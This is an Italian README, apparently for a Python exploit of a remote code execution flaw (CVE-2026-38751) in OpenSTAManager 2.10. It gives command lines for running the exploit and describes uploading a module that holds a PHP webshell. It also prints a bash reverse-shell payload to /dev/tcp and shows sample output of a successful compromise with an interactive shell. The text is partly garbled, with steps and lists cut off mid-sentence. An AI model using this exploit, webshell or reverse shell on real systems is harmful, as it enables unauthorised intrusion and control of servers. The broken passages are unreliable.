
OpenSTAManager RCE Exploit (CVE-2026-38751)
Questo script Python sfrutta una vulnerabilità di Remote Code Execution in OpenSTAManager versione 2.10, identificata come CVE-2026-38751. L'exploit consente agli utenti autenticati di caricare un modulo dannoso ed eseguire comandi arbitrari sul sistema target.
L'exploit segue questi passaggi:
MODULE)shell.php) che esegue comandi tramite il parametro GET crequests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
shell/MODULE: File di configurazione del moduloshell/shell.php: Webshell PHP che esegue i comandi passati tramite il parametro GET cid per confermare che funzioniL'exploit tenta diversi payload di reverse shell:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ Disclaimer: Questo exploit è destinato esclusivamente a scopo educativo e a test di sicurezza autorizzati.
Questa vulnerabilità consente:
Per proteggersi da questa vulnerabilità:
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
Questo exploit è fornito esclusivamente a scopo educativo. L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicito permesso di test è illegale.
| Argomento | Descrizione |
|---|
-u, --url | URL del target (obbligatorio) |
-U, --user | Nome utente per l'autenticazione (obbligatorio) |
-P, --password | Password per l'autenticazione (obbligatoria) |
--interactive | Entra in modalità shell interattiva |
--no-cleanup | Non rimuovere i file shell dopo l'esecuzione |
--lhost | Host locale per la reverse shell |
--lport | Porta locale per la reverse shell |